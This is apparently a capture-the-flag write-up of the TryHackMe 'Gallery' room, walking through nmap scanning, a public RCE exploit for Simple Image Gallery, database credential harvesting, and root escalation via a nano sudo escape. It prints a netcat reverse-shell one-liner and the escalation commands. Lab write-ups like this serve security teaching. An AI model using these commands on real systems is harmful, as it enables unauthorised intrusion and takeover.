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Gallery TryHackMe

Let’s take a look at the Gallery CTF on TryHackMe Created by @Mikaa.


Nmap Scan

The first step of my enumeration was a scan with nmap. by the command:

sudo nmap -sC -sS

The “Nmap Output” displayed 2 service running under port 80 and 8080. Nmap

And I've decided to search the http-title of the web application running in 8080: Simple Image Gallery and it come out as a Content management system.


Now let’s look for exploits that we can use.

searchsploit Simple Image Gallery

SearchSploit The Output displayed that there's a RCE: Remote Code Execution and a SQLi: SQL Injection. And I've decide to go with the RCE vulnerability: Exploit

So it successfully did a RCE and uploaded a shell on the host. As we open the link that we got, we did see a result of the RCE and I tried ls command on it: LsAll

Reverse Shell

I set up my netcat listener on port 4444 and I fired up Burp and sent a POST request with the following encoded payload using URL encoding:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4444 >/tmp/f

Great! I received a reverse connection on my port 4444. And I've upgraded the shell with pty module: shellOpen

Admin’s Password Hash

Now we're in the machine and I decided to take a look at the initialize.php file which gave me the username and the password for accessing the database: initial

Then I tried to connect to the database using the credentials of last file. And I found the Admin’s Password Hash: insideDB

User Flag

Inside the home directory of the mike user. I notice a file called user.txt but I didn't have the rights to access it. premDenied

As I was exploring I found a directory named backups and in it there was a folder with the name mike_home_backup. And inside it I looked for the bash_history file: bashHistory

Boom we found mike's password.

su mike

Then I found the user.txt file:


Root Flag

Now it’s time to escalate our privileges and get the root flag. sudoL

So as a result of sudo -l we found that there's a file called /opt/rootkit.sh which mike was allowed to run as sudo. And it ask for the user input and with the use of the switch cases it delivers:

Lastely I searched for nano on GTFObins and I found this:

sudo /bin/bash /opt/rootkit.sh
reset; sh 1>&0 2>&0

Running the file using sudo, entering the read command to open nano and following the steps of GTFObins helps me escalate to root: privEscDone

Then I found the root.txt file:


Thanks for reading!!!


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